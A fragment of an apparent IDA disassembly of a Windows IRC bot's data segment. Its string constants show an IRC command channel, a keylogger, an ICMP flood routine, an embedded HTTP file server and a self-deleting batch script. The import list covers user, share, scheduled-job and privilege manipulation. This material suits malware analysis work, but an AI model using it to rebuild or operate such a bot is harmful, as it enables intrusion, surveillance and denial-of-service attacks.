; DATA XREF: sub_404849+6BB�o
align 8
aTrTdColspan3_0 db '<TR>',0Dh,0Ah ; DATA XREF: sub_404849+6A6�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah
db '</TABLE>',0Dh,0Ah
db '</BODY>',0Dh,0Ah
db '</HTML>',0Dh,0Ah,0
align 10h
aPrivmsgSFoundS db 'PRIVMSG %s :Found %s Files and %s Directories',0Ah,0
; DATA XREF: sub_404849+68B�o
align 10h
a31s21sIBytes db '%-31s %-21s (%i bytes)',0Dh,0Ah,0 ; DATA XREF: sub_404849+5F1�o
align 10h
aTdTdWidthDCo_0 db '</TD>',0Dh,0Ah ; DATA XREF: sub_404849+5C9�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>%dk</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
aCodeSCodeA_0 db '"><CODE>%s</CODE></A>',0 ; DATA XREF: sub_404849:loc_404DCA�o
align 10h
aCode_30sGtCode db '"><CODE>%.30s></CODE></A>',0 ; DATA XREF: sub_404849+57A�o
align 10h
aSS db '%s%s',0 ; DATA XREF: sub_404849+523�o
; sub_4052D1+E6�o ...
align 4
aPrivmsgS31s2_0 db 'PRIVMSG %s :%-31s %-21s (%s bytes)',0Ah,0 ; DATA XREF: sub_404849+4C5�o
align 10h
a31s21s db '%-31s %-21s',0Dh,0Ah,0 ; DATA XREF: sub_404849+484�o
align 10h
aTdTdWidthDCode db '</TD>',0Dh,0Ah ; DATA XREF: sub_404849+451�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>-</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
aCodeSCodeA db '"><CODE>%s/</CODE></A>',0 ; DATA XREF: sub_404849:loc_404C5C�o
align 10h
aCode_29sGtCode db '"><CODE>%.29s>/</CODE></A>',0 ; DATA XREF: sub_404849+40C�o
align 10h
aSS_2 db '%s%s/',0 ; DATA XREF: sub_404849+3B5�o
align 4
aTrTdWidthDAHre db '<TR>',0Dh,0Ah ; DATA XREF: sub_404849+36C�o
; sub_404849+4DA�o
db '<TD WIDTH="%d"><A HREF="',0
align 4
aPrivmsgS31s21s db 'PRIVMSG %s :%-31s %-21s',0Ah,0 ; DATA XREF: sub_404849+33B�o
align 4
aS_0 db '<%s>',0 ; DATA XREF: sub_404849+311�o
; sub_404849+463�o
align 4
a2_2d2_2d4d2_2d db '%2.2d/%2.2d/%4d %2.2d:%2.2d %s',0 ; DATA XREF: sub_404849+2E5�o
aAm db 'AM',0 ; DATA XREF: sub_404849+2C4�o
align 10h
aPm db 'PM',0 ; DATA XREF: sub_404849+2B9�o
align 4
a__0: ; DATA XREF: sub_404849+27C�o
unicode 0, <.>,0
a__ db '..',0 ; DATA XREF: sub_404849+264�o
align 10h
aTrTdColspan3AH db '<TR>',0Dh,0Ah ; DATA XREF: sub_404849+1F0�o
db '<TD COLSPAN="3"><A HREF="%s"><CODE>Parent Directory</CODE></A></T'
db 'D>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
aSearchingForS db 'Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_404849+15C�o
aTrTdColspan3Hr db '<TR>',0Dh,0Ah ; DATA XREF: sub_404849+144�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 8
aTrTdWidthDCode db '<TR>',0Dh,0Ah ; DATA XREF: sub_404849+107�o
db '<TD WIDTH="%d"><CODE>Name</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d"><CODE>Last Modified</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>Size</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
aH1IndexOfSH1Ta db '<H1>Index of %s</H1>',0Dh,0Ah ; DATA XREF: sub_404849+B4�o
db '<TABLE BORDER="0">',0Dh,0Ah,0
align 10h
aHtmlHeadTitleI db '<HTML>',0Dh,0Ah ; DATA XREF: sub_404849+75�o
db '<HEAD>',0Dh,0Ah
db '<TITLE>Index of %s</TITLE>',0Dh,0Ah
db '</HEAD>',0Dh,0Ah
db '<BODY>',0Dh,0Ah,0
align 10h
aPrivmsgSSearch db 'PRIVMSG %s :Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_404849+3F�o
asc_4236F0: ; DATA XREF: sub_404849+1E�o
; sub_4052D1+F7�o ...
dw 0Ah
unicode 0, <>,0
aSSHttp1_1Refer db '%s %s HTTP/1.1',0Ah ; DATA XREF: sub_40503C+8A�o
db 'Referer: %s',0Ah
db 'Host: %s',0Ah
db 'Connection: close',0Ah
db 0Ah,0
align 10h
aHttp1_0200Ok_0 db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_405163+E4�o
db 'Server: myBot',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Content-Length: %i',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 10h
aHttp1_0200OkSe db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_405163+CA�o
db 'Server: myBot',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aHhMmSs db 'HH:mm:ss',0 ; DATA XREF: sub_405163+94�o
; sub_412B6A+17D�o ...
align 4
aDddDdMmmYyyy db 'ddd, dd MMM yyyy',0 ; DATA XREF: sub_405163+7B�o
align 4
aApplicationOct db 'application/octet-stream',0 ; DATA XREF: sub_405163:loc_4051CB�o
align 4
aTextHtml db 'text/html',0 ; DATA XREF: sub_405163+61�o
align 4
aHttpdFailedT_0 db '[HTTPD]: Failed to start worker thread, error: <%d>.',0
; DATA XREF: sub_4052D1+287�o
align 4
aHttpdWorkerThr db '[HTTPD]: Worker thread of server thread: %d.',0
; DATA XREF: sub_4052D1+213�o
align 4
asc_4239AC: ; DATA XREF: sub_4052D1+16E�o
unicode 0, <*>,0
aS_2 db '%s',0 ; DATA XREF: sub_4052D1+31�o
; sub_405D62+44�o ...
align 4
aS_7 db '\%s',0 ; DATA XREF: sub_4052D1+27�o
aHttpdErrorServ db '[HTTPD]: Error: server failed, returned: <%d>.',0
; DATA XREF: sub_40558B+3E0�o
align 4
asc_4239E8 db 0Dh,0Ah,0 ; DATA XREF: sub_40558B+296�o
align 4
aGet db 'GET ',0 ; DATA XREF: sub_40558B+22D�o
align 8
aIcmpErrorSendi db '[ICMP]: Error sending packets to IP: %s. Packets sent: %d. Return'
; DATA XREF: sub_4059CE+2F2�o
db 'ed: <%d>.',0
align 8
aIcmpDoneWithSF db '[ICMP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/s'
; DATA XREF: sub_4059CE+288�o
db 'ec (%dMB).',0
aIcmpInvalidTar db '[ICMP]: Invalid target IP.',0 ; DATA XREF: sub_4059CE+B6�o
align 10h
aIcmpErrorSetso db '[ICMP]: Error: setsockopt() failed, returned: <%d>.',0
; DATA XREF: sub_4059CE+8E�o
aIcmpErrorSocke db '[ICMP]: Error: socket() failed, returned: <%d>.',0
; DATA XREF: sub_4059CE+49�o
aSSS db '%s %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_405D62+69�o
aPrivmsg db 'PRIVMSG',0 ; DATA XREF: sub_405D62+16�o
; sub_409848+700�o
aNotice db 'NOTICE',0 ; DATA XREF: sub_405D62+F�o
; sub_409848+70E�o
align 10h
aKeylogS db '[KEYLOG]: %s',0 ; DATA XREF: sub_405E13+CF�o
align 10h
aDDDDDDS db '[%d-%d-%d %d:%d:%d] %s',0Dh,0Ah,0 ; DATA XREF: sub_405E13+A9�o
align 4
aAb db 'ab',0 ; DATA XREF: sub_405E13+70�o
; sub_409848+56FB�o
align 10h
asc_423B60: ; DATA XREF: sub_405E13+36�o
unicode 0, <\>,0
aSReturnS db '%s (Return) (%s)',0 ; DATA XREF: sub_405F16+223�o
align 4
aSBufferFullS db '%s (Buffer full) (%s)',0 ; DATA XREF: sub_405F16+1DA�o
align 10h
aSChangedWindow db '%s (Changed Windows: %s)',0 ; DATA XREF: sub_405F16+8E�o
align 4
aCapgetdriverde db 'capGetDriverDescriptionA',0 ; DATA XREF: sub_406217+C50�o
align 4
aCapcreatecaptu db 'capCreateCaptureWindowA',0 ; DATA XREF: sub_406217+C48�o
aAvicap32_dll db 'avicap32.dll',0 ; DATA XREF: sub_406217:loc_406E52�o
align 10h
aSqldisconnect db 'SQLDisconnect',0 ; DATA XREF: sub_406217+BE6�o
align 10h
aSqlfreehandle db 'SQLFreeHandle',0 ; DATA XREF: sub_406217+BD9�o
align 10h
aSqlallochandle db 'SQLAllocHandle',0 ; DATA XREF: sub_406217+BCC�o
align 10h
aSqlexecdirect db 'SQLExecDirect',0 ; DATA XREF: sub_406217+BBF�o
align 10h
aSqlsetenvattr db 'SQLSetEnvAttr',0 ; DATA XREF: sub_406217+BB2�o
align 10h
aSqldriverconne db 'SQLDriverConnect',0 ; DATA XREF: sub_406217+BAA�o
align 4
aOdbc32_dll db 'odbc32.dll',0 ; DATA XREF: sub_406217:loc_406DB4�o
align 10h
aShchangenotify db 'SHChangeNotify',0 ; DATA XREF: sub_406217+B68�o
align 10h
aShellexecutea db 'ShellExecuteA',0 ; DATA XREF: sub_406217+B60�o
align 10h
aShell32_dll db 'shell32.dll',0 ; DATA XREF: sub_406217:loc_406D6A�o
aWnetcancelco_0 db 'WNetCancelConnection2W',0 ; DATA XREF: sub_406217+B0E�o
align 4
aWnetcancelconn db 'WNetCancelConnection2A',0 ; DATA XREF: sub_406217+B01�o
align 4
aWnetaddconne_0 db 'WNetAddConnection2W',0 ; DATA XREF: sub_406217+AF4�o
aWnetaddconnect db 'WNetAddConnection2A',0 ; DATA XREF: sub_406217+AEC�o
aMpr_dll db 'mpr.dll',0 ; DATA XREF: sub_406217:loc_406CF6�o
aDeleteipnetent db 'DeleteIpNetEntry',0 ; DATA XREF: sub_406217+AAA�o
align 10h
aGetipnettable db 'GetIpNetTable',0 ; DATA XREF: sub_406217+AA2�o
align 10h
aIphlpapi_dll db 'iphlpapi.dll',0 ; DATA XREF: sub_406217:loc_406CAC�o
align 10h
aDnsflushreso_0 db 'DnsFlushResolverCacheEntry_A',0 ; DATA XREF: sub_406217+A60�o
align 10h
aDnsflushresolv db 'DnsFlushResolverCache',0 ; DATA XREF: sub_406217+A58�o
align 4
aDnsapi_dll db 'dnsapi.dll',0 ; DATA XREF: sub_406217:loc_406C62�o
align 4
aNetmessagebuff db 'NetMessageBufferSend',0 ; DATA XREF: sub_406217+9CE�o
align 4
aNetusergetinfo db 'NetUserGetInfo',0 ; DATA XREF: sub_406217+9C1�o
align 4
aNetuserenum db 'NetUserEnum',0 ; DATA XREF: sub_406217+9B4�o
aNetuserdel db 'NetUserDel',0 ; DATA XREF: sub_406217+9A7�o
align 4
aNetuseradd db 'NetUserAdd',0 ; DATA XREF: sub_406217+99A�o
align 10h
aNetremotetod db 'NetRemoteTOD',0 ; DATA XREF: sub_406217+98D�o
align 10h
aNetapibufferfr db 'NetApiBufferFree',0 ; DATA XREF: sub_406217+980�o
align 4
aNetschedulejob db 'NetScheduleJobAdd',0 ; DATA XREF: sub_406217+973�o
align 4
aNetshareenum db 'NetShareEnum',0 ; DATA XREF: sub_406217+966�o
align 4
aNetsharedel db 'NetShareDel',0 ; DATA XREF: sub_406217+959�o
aNetshareadd db 'NetShareAdd',0 ; DATA XREF: sub_406217+951�o
aNetapi32_dll db 'netapi32.dll',0 ; DATA XREF: sub_406217:loc_406B57�o
align 10h
aIcmpsendecho db 'IcmpSendEcho',0 ; DATA XREF: sub_406217+903�o
align 10h
aIcmpclosehandl db 'IcmpCloseHandle',0 ; DATA XREF: sub_406217+8F6�o
aIcmpcreatefile db 'IcmpCreateFile',0 ; DATA XREF: sub_406217+8EE�o
align 10h
aIcmp_dll db 'icmp.dll',0 ; DATA XREF: sub_406217:loc_406AF8�o
align 4
aMozilla4_0Comp db 'Mozilla/4.0 (compatible)',0 ; DATA XREF: sub_406217+8B4�o
align 4
aInternetcloseh db 'InternetCloseHandle',0 ; DATA XREF: sub_406217+842�o
aInternetreadfi db 'InternetReadFile',0 ; DATA XREF: sub_406217+835�o
align 10h
aInternetcracku db 'InternetCrackUrlA',0 ; DATA XREF: sub_406217+828�o
align 4
aInternetopenur db 'InternetOpenUrlA',0 ; DATA XREF: sub_406217+81B�o
align 4
aInternetopena db 'InternetOpenA',0 ; DATA XREF: sub_406217+80E�o
align 4
aInternetconnec db 'InternetConnectA',0 ; DATA XREF: sub_406217+801�o
align 4
aHttpsendreques db 'HttpSendRequestA',0 ; DATA XREF: sub_406217+7F4�o
align 10h
aHttpopenreques db 'HttpOpenRequestA',0 ; DATA XREF: sub_406217+7E7�o
align 4
aInternetgetc_0 db 'InternetGetConnectedStateEx',0 ; DATA XREF: sub_406217+7DA�o
aInternetgetcon db 'InternetGetConnectedState',0 ; DATA XREF: sub_406217+7D2�o
align 4
aWininet_dll db 'wininet.dll',0 ; DATA XREF: sub_406217:loc_4069D8�o
aClosesocket db 'closesocket',0 ; DATA XREF: sub_406217+688�o
aGetpeername db 'getpeername',0 ; DATA XREF: sub_406217+67B�o
aGethostbyaddr db 'gethostbyaddr',0 ; DATA XREF: sub_406217+66E�o
align 10h
aGethostbyname db 'gethostbyname',0 ; DATA XREF: sub_406217+661�o
align 10h
aGethostname db 'gethostname',0 ; DATA XREF: sub_406217+654�o
aGetsockname db 'getsockname',0 ; DATA XREF: sub_406217+647�o
aSetsockopt db 'setsockopt',0 ; DATA XREF: sub_406217+63A�o
align 4
aAccept db 'accept',0 ; DATA XREF: sub_406217+62D�o
align 4
aListen db 'listen',0 ; DATA XREF: sub_406217+620�o
align 4
aSelect db 'select',0 ; DATA XREF: sub_406217+613�o
align 4
aBind db 'bind',0 ; DATA XREF: sub_406217+60B�o
align 4
aRecvfrom db 'recvfrom',0 ; DATA XREF: sub_406217+5F9�o
align 10h
aRecv db 'recv',0 ; DATA XREF: sub_406217+5EC�o
align 4
aSendto db 'sendto',0 ; DATA XREF: sub_406217+5DF�o
align 10h
aSend db 'send',0 ; DATA XREF: sub_406217+5D2�o
; sub_409848+20C5�o
align 4
aNtohl db 'ntohl',0 ; DATA XREF: sub_406217+5C5�o
align 10h
aNtohs db 'ntohs',0 ; DATA XREF: sub_406217+5B8�o
align 4
aHtonl db 'htonl',0 ; DATA XREF: sub_406217+5AB�o
align 10h
aHtons db 'htons',0 ; DATA XREF: sub_406217+59E�o
align 4
aInet_addr db 'inet_addr',0 ; DATA XREF: sub_406217+591�o
align 4
aInet_ntoa db 'inet_ntoa',0 ; DATA XREF: sub_406217+584�o
align 10h
aConnect db 'connect',0 ; DATA XREF: sub_406217+577�o
aIoctlsocket db 'ioctlsocket',0 ; DATA XREF: sub_406217+56A�o
aSocket db 'socket',0 ; DATA XREF: sub_406217+55D�o
align 4
aWsacleanup db 'WSACleanup',0 ; DATA XREF: sub_406217+550�o
align 4
aWsagetlasterro db 'WSAGetLastError',0 ; DATA XREF: sub_406217+543�o
aWsaioctl db 'WSAIoctl',0 ; DATA XREF: sub_406217+536�o
align 4
a__wsafdisset db '__WSAFDIsSet',0 ; DATA XREF: sub_406217+529�o
align 4
aWsaasyncselect db 'WSAAsyncSelect',0 ; DATA XREF: sub_406217+51C�o
align 4
aWsasocketa db 'WSASocketA',0 ; DATA XREF: sub_406217+50F�o
align 10h
aWsastartup db 'WSAStartup',0 ; DATA XREF: sub_406217+507�o
align 4
aWs2_32_dll db 'ws2_32.dll',0 ; DATA XREF: sub_406217+4F6�o
align 4
aDeleteobject db 'DeleteObject',0 ; DATA XREF: sub_406217+483�o
align 4
aDeletedc db 'DeleteDC',0 ; DATA XREF: sub_406217+476�o
align 4
aBitblt db 'BitBlt',0 ; DATA XREF: sub_406217+469�o
align 4
aSelectobject db 'SelectObject',0 ; DATA XREF: sub_406217+45C�o
align 4
aGetdibcolortab db 'GetDIBColorTable',0 ; DATA XREF: sub_406217+44F�o
align 10h
aGetdevicecaps db 'GetDeviceCaps',0 ; DATA XREF: sub_406217+442�o
align 10h
aCreatecompatib db 'CreateCompatibleDC',0 ; DATA XREF: sub_406217+435�o
align 4
aCreatedibsecti db 'CreateDIBSection',0 ; DATA XREF: sub_406217+428�o
align 4
aCreatedca db 'CreateDCA',0 ; DATA XREF: sub_406217+420�o
align 4
aGdi32_dll db 'gdi32.dll',0 ; DATA XREF: sub_406217:loc_406626�o
align 10h
aGetusernamea db 'GetUserNameA',0 ; DATA XREF: sub_406217:loc_4065FE�o
align 10h
aIsvalidsecurit db 'IsValidSecurityDescriptor',0 ; DATA XREF: sub_406217+38F�o
align 4
aEnumservicesst db 'EnumServicesStatusA',0 ; DATA XREF: sub_406217+382�o
aCloseserviceha db 'CloseServiceHandle',0 ; DATA XREF: sub_406217+375�o
align 4
aDeleteservice db 'DeleteService',0 ; DATA XREF: sub_406217+368�o
align 4
aControlservice db 'ControlService',0 ; DATA XREF: sub_406217+35B�o
align 4
aStartservicea db 'StartServiceA',0 ; DATA XREF: sub_406217+34E�o
align 4
aOpenservicea db 'OpenServiceA',0 ; DATA XREF: sub_406217+341�o
align 4
aOpenscmanagera db 'OpenSCManagerA',0 ; DATA XREF: sub_406217:loc_406550�o
align 4
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_406217+309�o
align 4
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_406217+2FC�o
align 4
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_406217:loc_40650B�o
align 4
aRegclosekey db 'RegCloseKey',0 ; DATA XREF: sub_406217+2AC�o
aRegdeletevalue db 'RegDeleteValueA',0 ; DATA XREF: sub_406217+29F�o
aRegqueryvaluee db 'RegQueryValueExA',0 ; DATA XREF: sub_406217+292�o
align 4
aRegsetvalueexa db 'RegSetValueExA',0 ; DATA XREF: sub_406217+285�o
align 4
aRegcreatekeyex db 'RegCreateKeyExA',0 ; DATA XREF: sub_406217+278�o
aRegopenkeyexa db 'RegOpenKeyExA',0 ; DATA XREF: sub_406217+270�o
align 4
aAdvapi32_dll db 'advapi32.dll',0 ; DATA XREF: sub_406217:loc_406476�o
align 4
aGetforegroundw db 'GetForegroundWindow',0 ; DATA XREF: sub_406217+21A�o
aGetwindowtexta db 'GetWindowTextA',0 ; DATA XREF: sub_406217+20D�o
align 4
aGetkeystate db 'GetKeyState',0 ; DATA XREF: sub_406217+200�o
aGetasynckeysta db 'GetAsyncKeyState',0 ; DATA XREF: sub_406217:loc_40640F�o
align 4
aExitwindowsex db 'ExitWindowsEx',0 ; DATA XREF: sub_406217+1A0�o
align 4
aCloseclipboard db 'CloseClipboard',0 ; DATA XREF: sub_406217+193�o
align 4
aGetclipboardda db 'GetClipboardData',0 ; DATA XREF: sub_406217+186�o
align 10h
aOpenclipboard db 'OpenClipboard',0 ; DATA XREF: sub_406217+179�o
align 10h
aDestroywindow db 'DestroyWindow',0 ; DATA XREF: sub_406217+16C�o
align 10h
aIswindow db 'IsWindow',0 ; DATA XREF: sub_406217+15F�o
align 4
aFindwindowa db 'FindWindowA',0 ; DATA XREF: sub_406217+152�o
aSendmessagea db 'SendMessageA',0 ; DATA XREF: sub_406217+14A�o
align 4
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_406217:loc_40634C�o
; sub_4207EB+13�o
align 4
aRegisterservic db 'RegisterServiceProcess',0 ; DATA XREF: sub_406217:loc_40631F�o
align 4
aQueryperform_0 db 'QueryPerformanceFrequency',0 ; DATA XREF: sub_406217+A0�o
align 4
aQueryperforman db 'QueryPerformanceCounter',0 ; DATA XREF: sub_406217+93�o
aSearchpatha db 'SearchPathA',0 ; DATA XREF: sub_406217+86�o
aGetdrivetypea db 'GetDriveTypeA',0 ; DATA XREF: sub_406217+79�o
align 4
aGetlogicaldriv db 'GetLogicalDriveStringsA',0 ; DATA XREF: sub_406217+6C�o
aGetdiskfreespa db 'GetDiskFreeSpaceExA',0 ; DATA XREF: sub_406217+5F�o
aModule32first db 'Module32First',0 ; DATA XREF: sub_406217+52�o
align 4
aProcess32next db 'Process32Next',0 ; DATA XREF: sub_406217+45�o
align 4
aProcess32first db 'Process32First',0 ; DATA XREF: sub_406217+38�o
align 4
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0 ; DATA XREF: sub_406217+2B�o
align 4
aSeterrormode db 'SetErrorMode',0 ; DATA XREF: sub_406217+23�o
align 4
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_406217+A�o
; sub_41EFD0+1E�o
align 4
aMainDllTestCom db '[MAIN]: DLL test complete.',0 ; DATA XREF: sub_406EA4+2F2�o
align 10h
aAvicap32_dllFa db 'Avicap32.dll failed. <%d>',0 ; DATA XREF: sub_406EA4+2CC�o
align 4
aOdbc32_dllFail db 'Odbc32.dll failed. <%d>',0 ; DATA XREF: sub_406EA4+298�o
aShell32_dllFai db 'Shell32.dll failed. <%d>',0 ; DATA XREF: sub_406EA4+264�o
align 10h
aMpr32_dllFaile db 'Mpr32.dll failed. <%d>',0 ; DATA XREF: sub_406EA4+230�o
align 4
aIphlpapi_dllFa db 'Iphlpapi.dll failed. <%d>',0 ; DATA XREF: sub_406EA4+1FC�o
align 4
aDnsapi_dllFail db 'Dnsapi.dll failed. <%d>',0 ; DATA XREF: sub_406EA4+1C8�o
aNetapi32_dllFa db 'Netapi32.dll failed. <%d>',0 ; DATA XREF: sub_406EA4+194�o
align 4
aIcmp_dllFailed db 'Icmp.dll failed. <%d>',0 ; DATA XREF: sub_406EA4+160�o
align 10h
aWininet_dllFai db 'Wininet.dll failed. <%d>',0 ; DATA XREF: sub_406EA4+12C�o
align 4
aWs2_32_dllFail db 'Ws2_32.dll failed. <%d>',0 ; DATA XREF: sub_406EA4+F8�o
aGdi32_dllFaile db 'Gdi32.dll failed. <%d>',0 ; DATA XREF: sub_406EA4+C4�o
align 4
aAdvapi32_dllFa db 'Advapi32.dll failed. <%d>',0 ; DATA XREF: sub_406EA4+90�o
align 4
aUser32_dllFail db 'User32.dll failed. <%d>',0 ; DATA XREF: sub_406EA4+5C�o
aKernel32_dllFa db 'Kernel32.dll failed. <%d>',0 ; DATA XREF: sub_406EA4+28�o
align 4
aSErrorSD_ db '%s Error: %s <%d>.',0 ; DATA XREF: sub_407369+72�o
align 10h
aMirc_0 db 'mIRC',0 ; DATA XREF: sub_40742E+6�o
; sub_411072+18�o
align 4
aExplorer_exe db 'explorer.exe',0 ; DATA XREF: sub_4074B0+1A�o
align 4
aSeshutdownpriv db 'SeShutdownPrivilege',0 ; DATA XREF: sub_407554+2�o
aComspecCSS db '%%comspec%% /c %s %s',0 ; DATA XREF: sub_407576+13C�o
align 8
a@echoOffRepeat db '@echo off',0Dh,0Ah ; DATA XREF: sub_407576+80�o
db ':repeat',0Dh,0Ah
db 'del "%%1"',0Dh,0Ah
db 'if exist "%%1" goto repeat',0Dh,0Ah
db 'del "%s"',0
aSdel_bat db '%sdel.bat',0 ; DATA XREF: sub_407576+43�o
align 4
aContinued db 'Continued',0
align 4
aContinue_0 db 'Continue',0
align 10h
aPaused db 'Paused',0
align 4
aPause_0 db 'Pause',0
align 10h
aStopped_0 db 'Stopped',0 ; DATA XREF: .text:0042ED3C�o
aStop_0 db 'Stop',0 ; DATA XREF: .text:0042ED38�o
align 10h
aStarted db 'Started',0 ; DATA XREF: .text:0042ED30�o
aStart_0 db 'Start',0 ; DATA XREF: .text:0042ED2C�o
align 10h
aListed db 'Listed',0 ; DATA XREF: .text:0042ED24�o
align 4
aList_1 db 'List',0 ; DATA XREF: .text:0042ED20�o
align 10h
aDeleted db 'Deleted',0 ; DATA XREF: .text:0042ED18�o
aDelete_0 db 'Delete',0 ; DATA XREF: .text:0042ED14�o
align 10h
aAdded db 'Added',0 ; DATA XREF: .text:off_42ED0C�o
align 4
aAdd db 'Add',0 ; DATA XREF: .text:off_42ED08�o
aAnUnknownErr_0 db 'An unknown error occurred: <%ld>',0 ; DATA XREF: sub_4078AC+128�o
align 10h
aTheSystemIsShu db 'The system is shutting down.',0 ; DATA XREF: sub_4078AC:loc_4079C0�o
align 10h
aTheServiceHasN db 'The service has not been started.',0 ; DATA XREF: sub_4078AC:loc_4079B9�o
align 8
aTheRequested_1 db 'The requested control code cannot be sent to the service because '
; DATA XREF: sub_4078AC:loc_4079B2�o
db 'the state of the service.',0
align 4
aTheServiceHa_0 db 'The service has been marked for deletion.',0
; DATA XREF: sub_4078AC:loc_4079AB�o
align 10h
aTheServiceCoul db 'The service could not be logged on. The account does not have the'
; DATA XREF: sub_4078AC:loc_4079A4�o
db ' correct access rights.',0
align 4
aTheSpecified_0 db 'The specified service does not exist.',0
; DATA XREF: sub_4078AC:loc_40799D�o
align 4
aTheServiceHasB db 'The service has been disabled.',0 ; DATA XREF: sub_4078AC:loc_407996�o
align 8
aTheServiceDe_0 db 'The service depends on another service that has failed to start.',0
; DATA XREF: sub_4078AC:loc_40798F�o
align 10h
aTheServiceDepe db 'The service depends on a service that does not exist or has been '
; DATA XREF: sub_4078AC:loc_407988�o
db 'marked for deletion.',0
align 4
aTheSpecifiedDa db 'The specified database does not exist.',0
; DATA XREF: sub_4078AC:loc_407981�o
align 10h
aAnInstanceOfTh db 'An instance of the service is already running.',0
; DATA XREF: sub_4078AC:loc_407956�o
align 10h
aTheRequested_0 db 'The requested control code is not valid, or it is unacceptable to'
; DATA XREF: sub_4078AC:loc_40794F�o
db ' the service.',0
align 10h
aTheProcessForT db 'The process for the service was started, but it did not call Star'
; DATA XREF: sub_4078AC:loc_407948�o
db 'tServiceCtrlDispatcher.',0
align 4
aAThreadCouldNo db 'A thread could not be created for the service.',0
; DATA XREF: sub_4078AC:loc_407941�o
align 4
aTheDatabaseIsL db 'The database is locked.',0 ; DATA XREF: sub_4078AC+8B�o
align 8
aTheServiceCann db 'The service cannot be stopped because other running services are '
; DATA XREF: sub_4078AC:loc_407916�o
db 'dependent on it.',0
align 4
aTheServiceBina db 'The service binary file could not be found.',0
; DATA XREF: sub_4078AC:loc_40790C�o
aTheHandleDoesN db 'The handle does not have the required access right.',0
; DATA XREF: sub_4078AC:loc_407902�o
aTheHandleIsInv db 'The handle is invalid.',0 ; DATA XREF: sub_4078AC:loc_4078F8�o
align 4
aTheRequestedCo db 'The requested control code is undefined.',0
; DATA XREF: sub_4078AC:loc_4078EE�o
align 10h
aTheSpecifiedSe db 'The specified service name is invalid.',0 ; DATA XREF: sub_4078AC+38�o
align 4
aSSS_0 db '%s: %s (%s)',0 ; DATA XREF: sub_407A26+EE�o
aStopped db ' Stopped',0 ; DATA XREF: sub_407A26:loc_407AF5�o
aStarting db ' Starting',0 ; DATA XREF: sub_407A26:loc_407AEE�o
aStoping db ' Stoping',0 ; DATA XREF: sub_407A26:loc_407AE7�o
aRunning db ' Running',0 ; DATA XREF: sub_407A26:loc_407AE0�o
aContinuing db ' Continuing',0 ; DATA XREF: sub_407A26:loc_407AD9�o
aPausing db ' Pausing',0 ; DATA XREF: sub_407A26:loc_407AD2�o
aPaused_0 db ' Paused',0 ; DATA XREF: sub_407A26:loc_407ACB�o
aUnknown_0 db ' Unknown',0 ; DATA XREF: sub_407A26+9E�o
aTheFollowingWi db 'The following Windows services are registered:',0
; DATA XREF: sub_407A26+25�o
align 4
aNetUserInfoErr db '[NET]: User info error: <%ld>',0 ; DATA XREF: sub_407D31+394�o
align 4
aUnitsPerWeekD db 'Units Per Week: %d',0 ; DATA XREF: sub_407D31+36A�o
align 4
aMax_StorageD db 'Max. Storage: %d',0 ; DATA XREF: sub_407D31+33F�o
align 4
aUserSLanguageD db 'User',27h,'s Language: %d',0 ; DATA XREF: sub_407D31+317�o
aCountryCodeD db 'Country Code: %d',0 ; DATA XREF: sub_407D31+2EC�o
align 4
aWorkstationsS db 'Workstations: %S',0 ; DATA XREF: sub_407D31+2C4�o
align 4
aLogonServerS db 'Logon Server: %S',0 ; DATA XREF: sub_407D31+299�o
align 4
aLastLogoffD db 'Last Logoff: %d',0 ; DATA XREF: sub_407D31+271�o
aLastLogonD db 'Last Logon: %d',0 ; DATA XREF: sub_407D31+246�o
align 4
aNumberOfLogins db 'Number of Logins: %d',0 ; DATA XREF: sub_407D31+21E�o
align 4
aBadPasswordCou db 'Bad Password Count: %d',0 ; DATA XREF: sub_407D31+1F3�o
align 4
aPasswordAgeD db 'Password Age: %d',0 ; DATA XREF: sub_407D31+1CB�o
align 10h
aParametersS db 'Parameters: %S',0 ; DATA XREF: sub_407D31+1A0�o
align 10h
aHomeDirectoryS db 'Home Directory: %S',0 ; DATA XREF: sub_407D31+178�o
align 4
aAuthFlagsD db 'Auth Flags: %d',0 ; DATA XREF: sub_407D31+14D�o
align 4
aPrivilegeLevel db 'Privilege Level: %s',0 ; DATA XREF: sub_407D31+125�o
